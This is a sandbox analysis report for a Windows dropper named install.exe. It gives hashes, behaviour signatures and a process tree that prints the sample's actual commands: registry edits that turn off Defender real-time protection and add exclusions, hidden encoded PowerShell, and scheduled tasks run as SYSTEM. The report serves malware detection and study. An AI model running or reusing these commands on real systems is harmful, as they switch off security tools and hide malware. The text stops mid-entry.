Analysis

  • max time kernel
    88s
  • max time network
    91s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02/06/2024, 01:35

General

  • Target

    install.exe

  • Size

    6.3MB

  • MD5

    2570433695e66597cf18a2d427c5366d

  • SHA1

    88c9e4e3d7562c2b538b19066ceffd3bd2b80da1

  • SHA256

    987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236

  • SHA512

    cf220112dba66758512dcc0a37df298d25ab1c5390eb45826aee9690907ad9c94a3e6272419e1bd0c64a6af518b4945336f21aa8822e6cdfc545a604d7a578b6

  • SSDEEP

    98304:91Oih9g3v564EOC2yQlQyNky6wJ9cpq5rMlGRrodUkZ+52LYib/Z6fm1xE:91Oyif5sH6QyayJ6GFodL+52LNFE

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\install.exe
    "C:\Users\Admin\AppData\Local\Temp\install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Users\Admin\AppData\Local\Temp\7zS194B.tmp\Install.exe
      .\Install.exe /IwVludidZTK "385120" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\SysWOW64\cmd.exe
            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2524
            • \??\c:\windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
                PID:1872
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2536
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2516
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                  PID:2508
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:872
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                5⤵
                  PID:2648
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2664
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  4⤵
                    PID:2692
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      5⤵
                        PID:2480
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2412
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        4⤵
                          PID:2580
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            5⤵
                              PID:2528
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2556
                                • C:\Windows\SysWOW64\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  7⤵
                                    PID:2404
                          • C:\Windows\SysWOW64\forfiles.exe
                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                            3⤵
                              PID:2376
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                4⤵
                                  PID:2688
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2708
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      6⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:548
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\PPayxNV.exe\" PP /Fkqdidkbxn 385120 /S" /V1 /F
                                3⤵
                                • Drops file in Windows directory
                                • Creates scheduled task(s)
                                PID:2296
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
                                3⤵
                                  PID:320
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                    4⤵
                                      PID:2312
                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn btZaCbGShXZoJDfvCg
                                        5⤵
                                          PID:2828
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 520
                                      3⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:608
                                • C:\Windows\system32\taskeng.exe
                                  taskeng.exe {5CC491BD-5177-4439-BF39-DCC9B2FA5460} S-1-5-18:NT AUTHORITY\System:Service:
                                  1⤵
                                    PID:780
                                    • C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\PPayxNV.exe
                                      C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\PPayxNV.exe PP /Fkqdidkbxn 385120 /S
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      PID:1908
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        3⤵
                                          PID:644
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                            4⤵
                                              PID:2020
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                5⤵
                                                  PID:2148
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                    6⤵
                                                      PID:2088
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                  4⤵
                                                    PID:2108
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      5⤵
                                                        PID:1224
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                          6⤵
                                                            PID:2488
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                        4⤵
                                                          PID:1060
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            5⤵
                                                              PID:1332
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                6⤵
                                                                  PID:2012
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                              4⤵
                                                                PID:1996
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                  5⤵
                                                                    PID:2024
                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                      6⤵
                                                                        PID:2700
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                    4⤵
                                                                      PID:2492
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                        5⤵
                                                                          PID:2132
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                            6⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2080
                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                              7⤵
                                                                                PID:608
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "gwmcRWTMn" /SC once /ST 00:50:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        3⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:1584
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "gwmcRWTMn"
                                                                        3⤵
                                                                          PID:1760
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gwmcRWTMn"
                                                                          3⤵
                                                                            PID:112
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                            3⤵
                                                                              PID:888
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                4⤵
                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                PID:2076
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                              3⤵
                                                                                PID:1476
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:2276
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "ghQuiGKBb" /SC once /ST 00:39:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                3⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:1452
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "ghQuiGKBb"
                                                                                3⤵
                                                                                  PID:652
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /DELETE /F /TN "ghQuiGKBb"
                                                                                  3⤵
                                                                                    PID:1668
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                    3⤵
                                                                                      PID:2556
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                        4⤵
                                                                                          PID:2612
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2588
                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              6⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2172
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                        3⤵
                                                                                          PID:1788
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                            4⤵
                                                                                            • Windows security bypass
                                                                                            PID:548
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:1724
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:1756
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:1948
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32
                                                                                                4⤵
                                                                                                  PID:2688
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:1576
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64
                                                                                                    4⤵
                                                                                                      PID:1804
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\QmxEvEcN\LGLnUcdBZixZERLI.wsf"
                                                                                                    3⤵
                                                                                                      PID:1744
                                                                                                    • C:\Windows\SysWOW64\wscript.exe
                                                                                                      wscript "C:\Windows\Temp\QqEAMUespgTHJnVz\QmxEvEcN\LGLnUcdBZixZERLI.wsf"
                                                                                                      3⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2144
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1752
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1500
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2768
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2148
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:3048
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2068
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1996
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1228
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2260
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2492
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1456
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:568
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1584
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2676
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:2792
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64
                                                                                                        4⤵
                                                                                                        • Windows security bypass
                                                                                                        PID:1988
                                                                                                      • C:\Windows\SysWOW64\reg.exe
